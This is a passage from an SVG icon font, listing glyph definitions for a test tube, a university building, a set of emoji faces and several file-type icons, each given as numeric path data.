<glyph glyph-name="test-tube-alt" horiz-adv-x="1000" unicode="&#xeaf2;" d="M893-20l-236 408c-3 5-6 10-6 16 0 32 0 65 0 97 0 6 1 9 9 10 30 1 53 22 60 51 4 16 1 32 1 48 1 38-27 67-66 67-108 0-217 0-325 0-32 0-57-21-64-52-3-16-1-32-1-49 0-36 26-63 61-65 8-1 9-4 9-10 0-31 0-62 0-93 0-7-2-14-5-20-73-136-146-271-219-407-6-11-11-23-15-35-11-39 2-72 34-87 14-7 29-9 45-9h318c84 0 167 0 251 0 31 0 61-2 91 2 39 6 67 31 72 66 4 23-3 43-14 62z m-55-90c-9-4-19-5-30-5-105 0-210 0-315 0h-310c-9 0-17 0-25 2-25 5-35 19-30 44 3 12 8 23 14 34 74 138 148 276 222 414 4 7 6 14 6 22 0 44 0 89 0 133 0 8-2 12-11 11-9-1-19 0-28 0-19 1-31 13-32 31 0 11 0 22 0 32 0 22 13 34 35 34 92 0 183 0 275 0 15 0 30 1 46 0 19 0 32-13 32-32 0-11 0-22 0-33-1-19-13-32-32-32-10 0-21 0-31 0-6 0-8-2-8-7 1-48 1-96 0-144 0-6 3-10 6-15 74-139 149-277 224-417 7-14 13-28 13-44-1-15-7-24-21-28z m-395 825c22 0 41 19 41 41 0 23-19 42-41 41s-40-18-40-41c0-22 17-40 40-41z m97 65c20 1 35 16 35 35 0 19-16 35-35 35-19 0-35-17-35-35 0-19 16-35 35-35z m69-459c-4 7-8 7-14 4-27-15-51-34-71-56-13-14-26-28-39-41-21-21-46-29-75-26-26 3-52 7-76 16-9 3-13 0-17-8-32-59-65-118-97-177-17-32-35-64-52-96-8-15-7-16 10-16h622c27 0 28 0 14 24-68 125-137 251-205 376z m-73-323c-23-7-46 7-52 29-7 23 6 46 29 52 22 7 45-6 52-29 6-22-7-46-29-52z m96 93c-26-8-54 8-61 35-8 26 8 54 35 61 26 6 52-9 60-35 7-27-8-53-34-61z m-133 364c40 0 73 32 73 72 0 41-32 73-73 73-40 0-73-32-73-72 0-41 32-73 73-73z m-29-144c30 0 52 24 52 54 0 28-23 51-52 51-30 0-53-24-53-53 0-29 25-53 53-52z" />
<glyph glyph-name="university" horiz-adv-x="1000" unicode="&#xeaf3;" d="M196 369h111v-317h-111z m166 0h110v-317h-110z m166 0h110v-317h-110z m165 0h111v-317h-111z m-180 288v73h67l4-24h84v119h-67l-4 25h-108v-193l-403-161v-55h55c0-8 3-14 9-19 6-6 13-9 21-9h658c8 0 15 3 21 9 6 5 9 11 9 19h55v55l-401 161z m392-732c-6 6-13 8-21 8h-768c-8 0-15-2-21-8-6-5-9-12-9-19v-56h828v56c0 7-3 14-9 19z m-787 57c0-13 11-24 25-24h711c14 0 25 11 25 24s-11 25-25 25h-711c-14 0-25-11-25-25z" />
<glyph glyph-name="angry" horiz-adv-x="1000" unicode="&#xeaf4;" d="M313 207l44-51c80 69 205 69 285 0l44 51c-106 92-267 92-373 0z m-26 210h28c0-11 3-22 9-32 13-24 37-36 61-36 12 0 24 2 35 9 22 12 35 26 36 59h87c1-33 14-47 36-59 11-7 23-9 35-9 25 0 49 12 62 36 5 10 8 21 9 32h28v68h-426v-68z m213 433c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z" />
<glyph glyph-name="astonished" horiz-adv-x="1000" unicode="&#xeaf5;" d="M482 425c0 46-38 83-83 83s-83-37-83-83 37-83 83-83 83 37 83 83z m-83-15c-8 0-15 7-15 15s7 15 15 15c8 0 15-7 15-15s-7-15-15-15z m243 87c-40 22-90 8-113-32-11-19-13-41-7-62s19-39 39-50c12-7 26-11 40-11 29 0 57 15 72 42 23 40 8 91-31 113z m-28-79c-4-8-13-10-20-6h0c-5 2-7 7-7 9-1 2-2 7 1 12 3 4 8 7 13 7 3 0 5 0 8-2 7-4 10-13 5-20z m-73-213c-40 22-91 8-113-32-11-19-13-41-8-62s20-39 40-50c12-7 26-11 40-11 29 0 57 15 72 42 22 40 8 90-31 113z m-28-79c-4-8-13-11-20-6h0c-5 2-7 7-8 9 0 2-1 7 2 11 3 5 8 8 13 8 3 0 5 0 8-2 7-4 9-13 5-20z m-13 724c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z" />
<glyph glyph-name="confounded" horiz-adv-x="1000" unicode="&#xeaf6;" d="M374 341c52 0 95 43 95 95s-43 95-95 95c-53 0-95-43-95-95s42-95 95-95z m0 123c15 0 27-13 27-28s-12-27-27-27c-15 0-28 12-28 27s13 28 28 28z m299 55c-22 12-48 15-72 9-25-7-45-23-57-45-13-22-16-48-9-72 7-25 23-45 45-57 14-9 30-13 46-13 9 0 17 1 26 4 24 7 45 23 57 45 12 22 16 47 9 72-7 24-23 44-45 57z m-23-96c-3-7-9-11-16-13-7-2-15-1-21 2h0c-6 4-11 10-13 17-2 7-1 14 3 21 3 6 9 11 16 13 2 0 5 1 7 1 5 0 10-2 14-4 6-4 11-9 13-16 2-7 1-15-3-21z m-43-230c-15 0-20 4-32 14-15 13-36 31-75 31-39 0-60-18-75-31-12-10-17-14-32-14-14 0-19 4-31 14-15 13-42 31-75 31v-68c11 0 20-4 32-14 15-13 36-31 75-31 39 0 59 18 75 31 11 10 17 14 31 14 15 0 20-4 32-14 15-13 36-31 75-31s59 18 75 31c12 10 20 14 31 14v68c-33 0-60-18-75-31-12-10-17-14-31-14z m-107 657c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z" />
<glyph glyph-name="confused" horiz-adv-x="1000" unicode="&#xeaf7;" d="M399 421c45 0 83 37 83 83 0 5-1 7-2 10l-4 27h-154l-5-27c0-3-1-6-1-11 0-46 37-82 83-82z m162 11c12-8 26-11 40-11 29 0 57 15 72 42 9 16 13 33 10 51l-5 27h-154l-4-27c-6-34 11-66 41-82z m-102-155c-96-16-177-56-180-58l30-60c3 1 287 141 375-16l59 33c-35 62-113 131-284 101z m41 573c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z" />
<glyph glyph-name="crying" horiz-adv-x="1000" unicode="&#xeaf8;" d="M500 850c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z m-186 268l44-51c80 69 205 69 284 0l44 51c-106 92-266 92-372 0z m85 169c45 0 83 37 83 82s-38 83-83 83c-46 0-83-37-83-83s37-82 83-82z m162 10c12-7 26-10 40-10 29 0 57 15 72 42 23 39 8 90-31 112-40 23-90 8-113-31-22-40-8-90 32-113z m-278-5c-13-1-27-3-39-7-15-5-25-23-22-35 2-13 13-24 26-26 10-2 25 5 31 15 9 17 17 35 26 53-7 0-15 1-22 0z m-29-118c-11 0-23 0-32-8-7-5-13-12-11-21 1-9 8-15 17-18 8-2 15 2 21 8 2 3 4 6 5 9 5 10 9 19 15 30-5 0-10 1-15 0z" />
<glyph glyph-name="dizzy" horiz-adv-x="1000" unicode="&#xeaf9;" d="M482 481c0 46-38 83-83 83s-83-37-83-83 37-82 83-82 83 37 83 82z m-98 0c0 9 7 15 15 15 8 0 15-6 15-15s-7-15-15-15c-8 0-15 7-15 15z m258 72c-40 23-91 8-113-31-11-20-13-42-7-63s19-39 39-50c12-7 26-10 40-10 29 0 57 15 72 42 23 39 8 90-31 112z m-28-79c-4-8-13-10-20-6h0c-5 3-7 7-7 9-1 2-2 7 1 12 3 5 8 7 13 7 3 0 5 0 8-2 7-4 10-13 5-20z m-11-238l-48 48-55-55-55 55-47-48 54-54-64-65 48-47 64 64 64-64 48 47-64 65z m-103 614c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z" />
<glyph glyph-name="expressionless" horiz-adv-x="1000" unicode="&#xeafa;" d="M287 249h415v-68h-415v68z m213 601c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z m-135 425c3 0 7 1 10 1 45 5 78 46 72 92-5 45-46 77-92 72-21-3-41-14-55-31s-19-39-17-61c5-42 41-73 82-73z m299 155c-19 11-41 13-63 8-21-6-39-20-49-40-11-19-14-41-8-62 6-22 20-39 39-50h0c13-7 27-11 40-11 29 0 57 16 73 42 22 40 8 91-32 113z" />
<glyph glyph-name="heart-eyes" horiz-adv-x="1000" unicode="&#xeafb;" d="M500 850c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z m196 300c-4 0-8 0-12-1-13-4-25-10-38-13-41-9-83-11-125-12-41-2-83-1-124 4-24 3-48 8-70 16-6 3-12 4-18 4-7 1-11-3-12-10-2-10 1-20 7-28 26-36 59-66 97-89 30-18 62-29 97-29 23 0 46 4 67 13 42 16 76 42 105 76 12 14 23 29 30 46 2 5 3 10 4 15 0 5-3 8-8 8z m115 256c-14 33-54 51-88 40-10-3-18-7-26-14 0 1 0 1 0 1-6 33-25 53-57 61-25 6-48-1-66-19-15-14-20-32-21-52-1-24 5-46 13-68 15-37 36-69 61-99 0-1 2-2 3-2 8 2 15 3 23 4 34 7 67 17 98 34 19 10 36 23 50 41 17 22 21 47 10 73z m-441-152c1 0 3 1 4 2 24 30 46 62 60 99 8 22 14 44 13 68-1 20-6 38-21 52-18 18-41 25-66 19-32-8-51-28-57-61 0 0 0 0 0-1-8 7-16 11-25 14-35 11-74-7-89-40-11-26-7-51 10-73 14-18 31-31 50-41 31-17 64-27 98-34 8-1 15-2 23-4z" />
<glyph glyph-name="laughing" horiz-adv-x="1000" unicode="&#xeafc;" d="M500 850c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z m-59 617c0-27-22-49-49-49s-49 22-49 49c0 27 22 49 49 49s49-22 49-49z m177 43c24-13 32-43 19-67s-43-31-67-18c-23 13-32 43-18 66s43 32 66 19z m-354-323c0-41 11-77 28-108s44-62 76-79c33-16 71-32 115-32h29c42 0 80 16 112 33 33 16 57 43 75 74 18 31 26 70 26 109v121h-461v-118z m56 51h360v-55c0-45-17-83-46-107s-71-40-123-40h-27c-53 0-93 16-122 42-29 26-42 65-42 112v48z" />
<glyph glyph-name="nerd-smile" horiz-adv-x="1000" unicode="&#xeafd;" d="M500 850c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z m142 272c-79-69-204-69-284 0-14 12-36 11-48-3-12-14-10-36 4-48 53-46 119-69 186-69s133 23 186 69c14 12 16 34 4 48-12 14-34 15-48 3z m-322 251c-27 0-49-22-49-49s22-49 49-49c27 0 49 22 49 49s-22 49-49 49z m395-6c-23 13-53 5-67-19s-4-53 19-66c24-14 53-5 67 18 13 24 5 54-19 67z m-30 122c-60 0-113-34-139-84-14 6-28 10-43 10-20 1-36-6-48-12-26 51-79 86-140 86-87 0-158-70-158-157 0-87 71-158 158-158s157 71 157 158c0 1 0 1 0 2 5 1 9 4 12 8 1 0 8 6 18 6 9 0 19-6 26-12 0-1 0-3 0-4 0-87 71-158 157-158s158 71 158 158c0 87-71 157-158 157z m-370-247c-50 0-90 40-90 90 0 49 40 90 90 90s90-41 90-90c0-50-41-90-90-90z m370 0c-49 0-90 40-90 90 0 49 41 90 90 90s90-41 90-90c0-50-40-90-90-90z" />
<glyph glyph-name="open-mouth" horiz-adv-x="1000" unicode="&#xeafe;" d="M469 436c0 52-43 95-95 95-53 0-95-43-95-95s42-95 95-95c52 0 95 43 95 95z m-123 0c0 15 13 28 28 28 15 0 27-13 27-28s-12-27-27-27c-15 0-28 12-28 27z m327 83c-22 12-48 15-72 9-25-7-45-23-57-45-13-22-16-48-9-72 7-25 23-45 45-57 14-9 30-13 46-13 9 0 17 1 26 4 24 7 45 23 57 45 12 22 16 47 9 72-7 24-23 44-45 57z m-23-96c-3-7-9-11-16-13-7-2-15-1-21 2h0c-6 4-11 10-13 17-2 7-1 14 3 21 3 6 9 11 16 13 2 0 5 1 7 1 5 0 10-2 14-4 6-4 11-9 13-16 2-7 1-15-3-21z m-150-73c-98 0-178-80-178-178s80-177 178-177 178 79 178 177-80 178-178 178z m0-288c-61 0-110 50-110 110s49 111 110 111 110-50 110-111-49-110-110-110z m0 788c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z" />
<glyph glyph-name="rage" horiz-adv-x="1000" unicode="&#xeaff;" d="M500 850c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z m251 595l-167-75 27-61c-15-7-28-19-37-34-22-40-8-90 32-113 12-7 26-10 40-10 29 0 57 15 72 42 22 40 8 90-31 112-21 12-44 14-65 7l157 71-28 61z m-318-379l30-60c1 0 87 42 141 3l40 54c-87 64-206 5-211 3z m-44 243l28 61-168 75-27-61 156-71c-8 3-16 4-24 4-46 0-83-37-83-83s37-82 83-82c46 0 83 37 83 82 0 33-20 62-48 75z m-38-60c1 0 2 1 3 1 0 0 1 0 1 0-1-1-3-1-4-1z" />
<glyph glyph-name="rolling-eyes" horiz-adv-x="1000" unicode="&#xeb00;" d="M399 204c-46 0-83-37-83-82s37-83 83-83 83 37 83 83-38 82-83 82z m0-98c-8 0-15 7-15 16s7 15 15 15c8 0 15-7 15-15s-7-16-15-16z m286 439c-59 0-112-33-138-83-14 8-29 12-44 12h-1c-20 0-36-7-48-14-26 51-79 85-139 85-87 0-158-71-158-157 0-87 71-158 158-158s157 71 157 158c0 8-1 16-2 23l14-14c7 6 22 13 44-5 0-2 0-3 0-4 0-87 71-158 157-158s158 71 158 158c0 86-71 157-158 157z m-460-157c0 49 40 90 90 90 24 0 47-10 63-27 0 0-1 0-2 0-45 0-82-37-82-82 0-29 15-55 38-70-6-1-11-1-17-1-50 0-90 40-90 90z m460-90c-5 0-11 0-17 1 11 7 21 17 28 29 22 40 8 90-32 113-13 7-28 11-42 10 16 17 39 27 63 27 50 0 90-41 90-90s-40-90-90-90z m-185 552c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z" />
<glyph glyph-name="sad" horiz-adv-x="1000" unicode="&#xeb01;" d="M500 850c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z m-186 268l44-51c80 69 205 69 284 0l44 51c-106 92-266 92-372 0z m85 169c45 0 83 37 83 82s-38 83-83 83c-46 0-83-37-83-83s37-82 83-82z m162 10c12-7 26-10 40-10 29 0 57 15 72 42 23 39 8 90-31 112-40 23-90 8-113-31-22-40-8-90 32-113z" />
<glyph glyph-name="simple-smile" horiz-adv-x="1000" unicode="&#xeb02;" d="M500 850c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z m251 467c-19 0-34-15-34-34 0-120-97-217-217-217s-217 97-217 217c0 19-15 34-34 34s-34-15-34-34c0-157 128-285 285-285s285 128 285 285c0 19-15 34-34 34z m-303 120c0-27-22-49-49-49s-49 22-49 49c0 27 22 49 49 49s49-22 49-49z m177 42c24-13 32-43 19-66s-43-32-67-19c-23 13-32 43-18 67s43 32 66 18z" />
<glyph glyph-name="slightly-smile" horiz-adv-x="1000" unicode="&#xeb03;" d="M500 850c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z m142 280c-79-69-204-69-284 0-14 12-36 11-48-3-12-14-10-36 4-48 53-46 119-69 186-69s133 23 186 69c14 12 16 34 4 48s-34 15-48 3z m-194 262c0-27-22-49-49-49s-49 22-49 49c0 27 22 49 49 49s49-22 49-49z m177 42c24-13 32-43 19-66s-43-32-67-19c-23 13-32 43-18 67s43 32 66 18z" />
<glyph glyph-name="smirk" horiz-adv-x="1000" unicode="&#xeb04;" d="M283 328h-68c0-158 128-285 285-285v67c-124 0-217 94-217 218z m42 101h148l6 24c2 7 3 12 3 18 0 45-37 82-83 82s-83-37-83-83c0-6 1-10 3-17l6-24z m317 113c-40 22-90 8-113-32-10-18-13-37-8-57l6-24h148l6 24c9 36-7 71-39 89z m-142 308c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z" />
<glyph glyph-name="stuck-out-tongue" horiz-adv-x="1000" unicode="&#xeb05;" d="M500 850c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z m-59 617c0-27-22-49-49-49s-49 22-49 49c0 27 22 49 49 49s49-22 49-49z m177 43c24-13 32-43 19-67s-43-31-67-18c-23 13-32 43-18 66s43 32 66 19z m115-273h-478c58-45 122-67 188-75 14-1 19-7 21-24 3-27 7-53 12-80 7-37 20-68 50-83 55-27 110 3 133 73 16 48 16 95 0 142 26 16 51 28 76 43-1 2-1 4-2 4z" />
<glyph glyph-name="wink-smile" horiz-adv-x="1000" unicode="&#xeb06;" d="M500 111c-120 0-217 93-217 217h-68c0-158 128-285 285-285s285 127 285 285h-68c0-124-97-217-217-217z m-165 318h128l9 16c6 12 10 24 10 37 0 46-38 82-83 82s-83-37-83-83c0-13 3-24 10-36l9-16z m226-20h0c12-7 26-11 40-11 29 0 57 16 72 43 23 39 8 90-31 112-20 11-42 14-63 8-21-6-39-20-50-39-11-20-13-42-7-63 6-21 19-39 39-50z m-61 441c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z" />
<glyph glyph-name="worried" horiz-adv-x="1000" unicode="&#xeb07;" d="M500 850c-276 0-500-224-500-500s224-500 500-500 500 224 500 500-224 500-500 500z m0-933c-238 0-433 195-433 433s195 433 433 433 433-194 433-433-194-433-433-433z m0 453c-114 0-213-63-259-165-8-17 0-36 17-44 17-8 36 0 44 17 35 76 111 124 198 124s163-48 198-124c6-13 18-20 31-20 4 0 9 1 14 3 17 7 24 27 16 44-46 102-145 165-259 165z m-101 85c27 0 49 22 49 49s-22 48-49 48-49-21-49-48c0-27 22-49 49-49z m178 6c24-13 54-5 67 19 13 23 5 53-19 66s-53 5-66-18c-14-24-5-54 18-67z" />
<glyph glyph-name="file-alt" horiz-adv-x="1000" unicode="&#xeb08;" d="M827 640c-55 56-110 112-167 165-13 13-28 25-45 34-14 7-28 11-44 11l-298 0c-81 0-142-52-156-132-1-2-2-3-2-5v-726c4-5 2-11 4-17 15-62 63-108 127-118 2 0 4-1 6-2h495c16 5 32 7 47 14 49 24 79 63 88 117 1 2 0 5 3 6v562c-8 38-33 65-58 91z m-19-151c-1-159-1-318-1-478 0-34-12-60-43-76-13-7-26-8-41-8-149 0-298 0-448 0-51 0-83 32-83 84 0 113 0 227 0 340 0 113 0 227 0 340 0 33 14 59 44 74 12 7 25 8 38 8l267 0c15 0 25-6 30-21 5-11 5-23 5-36 1-42 1-85 1-128 0-31 14-45 45-45l127-1c3 0 6 0 9 0 48-4 50-21 50-53z m-92-103c-145 0-289 0-433 0-11 0-15-1-14-4 0-10 1-19 0-29-1-5 4-5 17-5 71 0 142 0 213 0 72 0 145 0 217 0 11 0 14 0 14 4-1 10-1 20 0 30 0 3-4 4-14 4z m-438 45c39 0 78 0 117 0 40 0 80 0 119 0 6 0 8 1 8 8 0 17 0 34 0 51 0 7-2 8-8 8-79 0-158 0-238 0-6 0-8-1-7-8 0-16 0-33-1-49 0-9 3-10 10-10z m438-111c-145 0-289 0-433 0-11 0-15-1-14-5 0-9 1-19 0-28-1-5 4-6 17-6 71 0 142 0 213 0 72 0 145 0 217 0 11 0 14 1 14 5-1 10-1 19 0 29 0 4-4 5-14 5z m0-69c-145 0-289 0-433 0-11 0-15-1-14-5 0-9 1-19 0-28-1-5 4-6 17-6 71 1 142 0 213 0 72 0 145 1 217 0 11 0 14 1 14 5-1 10-1 20 0 29 0 4-4 5-14 5z m-128-99c-84 0-167 0-250 0-7 0-9-1-9-4 1-10 1-19 0-29 0-5 3-5 11-5 41 0 81 0 122 0 42 0 84 0 126 0 6 0 8 0 8 4 0 10 0 20 0 30 0 3-2 4-8 4z m-283 0c-12 0-24 0-35 0-1 0-1-1-1-4 0-10 0-19 0-29 0-5 0-5 1-5 6 0 11 0 17 0 6 0 12 0 18 0 0 0 1 0 1 4 0 10 0 20 0 30 0 3-1 4-1 4z m283-73c-84 0-167 0-250 0-7 0-9-1-9-5 1-9 1-18 0-28 0-5 3-6 11-6 41 1 81 1 122 1 42 0 84 0 126-1 6 0 8 1 8 5 0 10 0 20 0 30 0 3-2 4-8 4z m-283 0c-12 0-24 0-35 0-1 0-1-1-1-5 0-9 0-18 0-28 0-5 0-6 1-6 6 1 11 1 17 1 6 0 12 0 18-1 0 0 1 1 1 5 0 10 0 20 0 30 0 3-1 4-1 4z" />
<glyph glyph-name="file-audio" horiz-adv-x="1000" unicode="&#xeb09;" d="M495 385c0 31 0 62 0 92 0 12-7 17-18 11-38-21-76-43-115-64-3-2-4-4-4-8 0-22 0-43 0-65 0-23 0-46 0-68 0-3 0-4 2-5 40-21 79-42 118-63 9-6 17-1 17 10 0 30 0 60 0 90 0 3 0 5 2 8 14 15 14 38 1 53-3 3-3 6-3 9z m160 142c-2 2-3 3-5 1-8-9-17-18-26-27-2-1-2-2 0-4 6-4 11-9 15-14 45-46 63-101 53-164-7-47-30-85-66-116-3-2-3-3-1-5 9-8 17-16 26-25 2-3 3-2 5 0 10 8 20 18 28 28 35 43 53 93 54 149 0 30-6 60-18 89-15 35-36 64-65 88z m6-148c-7 39-26 71-56 97-3 2-4 2-7 0-8-8-16-17-24-24-2-3-3-4 1-7 38-31 52-72 44-120-6-28-21-52-44-70-3-2-3-4 0-6 8-8 16-15 23-23 3-4 6-4 9-1 37 34 56 75 57 125 0 10-1 19-3 29z m-327 39h-52c-12 0-20-8-20-21v-95c0-11 8-20 20-20 17 0 35 0 52 0 4 0 5 1 5 4-1 21-1 42-1 64 0 21 0 42 1 64 0 3-1 4-5 4z m218 5c-2 2-3 3-6 1-9-10-18-18-27-27-2-2-1-3 1-4 34-20 33-67 1-86-3-1-2-2 0-4 8-9 17-17 25-26 3-2 4-2 7 0 23 19 34 43 35 73 0 29-12 54-36 73z m290 427h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-avi-mp4" horiz-adv-x="1000" unicode="&#xeb0a;" d="M715 576h-430c-6 0-11-5-11-11v-430c0-6 5-11 11-11l430 0c6 0 11 5 11 11v430c0 6-5 11-11 11z m-148-31c0 7 5 12 11 12h24c6 0 11-5 11-12v-40c0-6-5-11-11-11h-24c-6 0-11 5-11 11v40z m-90 1c0 6 5 11 11 11h24c6 0 11-5 11-11v-42c0-6-5-11-11-11h-24c-6 0-11 5-11 11v42z m-89 0c0 6 5 11 11 11h25c6 0 11-5 11-11v-41c0-6-5-11-11-11h-25c-6 0-11 5-11 11v41z m-95 0c0 6 5 11 12 11h29c6 0 11-5 11-11v-41c0-6-5-11-11-11h-29c-7 0-12 5-12 11v41z m52-391c0-7-5-12-11-12h-30c-6 0-11 5-11 12v40c0 6 5 11 11 11h30c6 0 11-5 11-11v-40z m90 0c0-6-5-11-12-11h-24c-6 0-11 5-11 11v40c0 7 5 12 11 12h24c7 0 12-5 12-12v-40z m88-1c0-6-5-11-11-11h-24c-6 0-11 5-11 11v41c0 7 5 12 11 12h24c6 0 11-5 11-12v-41z m90 1c0-6-5-11-11-11h-24c-6 0-11 5-11 11v40c0 7 5 12 11 12h24c6 0 11-5 11-12v-40z m93-1c0-6-5-11-11-11h-28c-6 0-11 5-11 11v41c0 6 5 11 11 11h28c6 0 11-5 11-11v-41z m0 84c0-7-5-12-11-12h-391c-6 0-11 5-11 12v225c0 6 5 11 11 11h391c6 0 11-5 11-11v-225z m0 267c0-6-5-11-11-11h-27c-6 0-11 5-11 11v41c0 6 5 11 11 11h27c6 0 11-5 11-11v-41z m-234-100c-5 3-12-1-12-7v-106c0-6 7-9 12-7 33 18 66 35 99 53 6 3 6 11 0 14-34 18-66 35-99 53z m370 445h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-bmp" horiz-adv-x="1000" unicode="&#xeb0b;" d="M714 558c-6-2-13-6-19-7-24-1-40-15-52-33-10-16-9-32 1-48 10-15 24-22 41-20 20 1 33 12 39 30 8 27 7 53-7 78l-3 0z m-81-82c-4-10-8-17-11-25-1-3 0-7 2-8 15-10 29-18 44-26 4-2 11 0 14 3 8 7 13 16 21 27-33-8-55 1-70 29z m-52-124c-5-12-1-26 6-30 7-5 20-1 30 9l0 1c15 20 30 40 46 61-10 5-19 7-28 13-8 4-16 11-25 17-10-24-21-47-29-71z m83 19c-15-18-30-36-46-54-8-10-19-15-32-11-12 4-17 14-20 26-3 14 1 27 7 40 16 35 32 70 47 105 1 3 0 10-3 11-16 11-31 25-48 32-85 36-205 14-263-77-34-52-44-110-27-170 16-57 55-95 107-120 39-19 75-12 105 20 14 15 26 33 37 50 9 15 20 20 37 20 34-3 63 7 84 35 23 30 27 65 23 104-4-5-6-8-8-11z m-290 55c21 0 36-15 36-36 0-20-15-36-36-36-20 0-35 16-35 36 0 20 14 35 35 36z m-20-166c-20 0-36 16-36 36 0 21 15 36 36 36 20 0 35-15 35-36 0-19-15-35-35-36z m71-72c-20 0-37 17-36 37 0 19 17 35 37 35 19-1 34-17 34-36 0-20-16-36-35-36z m29 229c-20 0-36 16-36 37 1 20 16 35 37 34 20 0 36-16 35-36-1-19-16-35-36-35z m388 433h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-code" horiz-adv-x="1000" unicode="&#xeb0c;" d="M460 279c1 0 1 0 1 1v25c0 1 0 2-1 3l-68 27c-1 0-1 1 0 1l68 26c1 1 1 2 1 3v25c0 1 0 2-1 1l-98-43c-1 0-2-1-2-2v-21c0-1 1-3 2-3l98-43z m24-20c3 0 5 0 6 2 2 1 3 3 3 5 1 2 2 5 3 9l28 117c1 6 2 10 2 12 0 3-1 5-2 7-2 1-5 2-8 2-4 0-7-1-8-3-1-3-3-7-4-13l-28-118c-2-6-2-10-2-11 0-6 3-9 10-9z m154 63c1 1 2 2 2 3v21c0 1-1 2-2 2l-98 43c-1 0-2 0-2-1v-25c0-1 1-2 2-3l68-26c0-1 0-1 0-1l-68-27c-1-1-2-2-2-3v-25c0-1 1-1 2-1l98 43z m67 235h-410c-16 0-28-12-28-28v-358c0-16 12-28 28-28h410c15 0 28 12 28 28v358c0 16-13 28-28 28z m0-386h-410v311h410v-311z m137 679h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z m-7-556v-364c0-7-5-12-12-12h-647c-6 0-11 5-11 12v840c0 7 5 12 11 12h489c14 0 36-10 45-21l16-18c10-12 20-24 30-35 14-16 28-32 41-48l18-21c10-11 20-37 20-52v-293z" />
<glyph glyph-name="file-css" horiz-adv-x="1000" unicode="&#xeb0d;" d="M282 585c2-17 5-34 6-51 5-56 10-112 15-168 4-46 8-93 12-139 2-23 5-45 6-67 1-7 5-8 9-9l154-43c4-1 8-3 12-4h8c24 7 48 14 72 21 31 9 62 17 93 25 6 2 9 5 10 13 5 55 10 111 15 167l14 161c2 29 5 59 8 89 0 2 1 3 1 5v11h-435c0-3 0-7 0-11z m395-26c-2-18-3-36-5-54l-10-119-13-142c-2-18-4-35-5-53 0-7-2-10-8-12-44-11-87-24-131-35-3-1-7-1-11 0-43 11-86 24-129 35-7 2-8 6-9 11-3 39-7 78-10 116-5 48-9 96-13 144-3 36-6 72-10 109l354 0z m-313-95l1-12h213l-5-57h-139l1-15 2-28 1-13h130l-6-72-62-17-62 17-4 44h-56l8-87 114-32 0 0 114 32 1 9 9 106v1l0 2 14 151 1 15h-279l2-15 2-29z m478 386h-666c-44 0-79-36-79-80v-840c0-44 35-80 79-80h647c44 0 80 36 80 80v859c0 34-27 61-61 61z 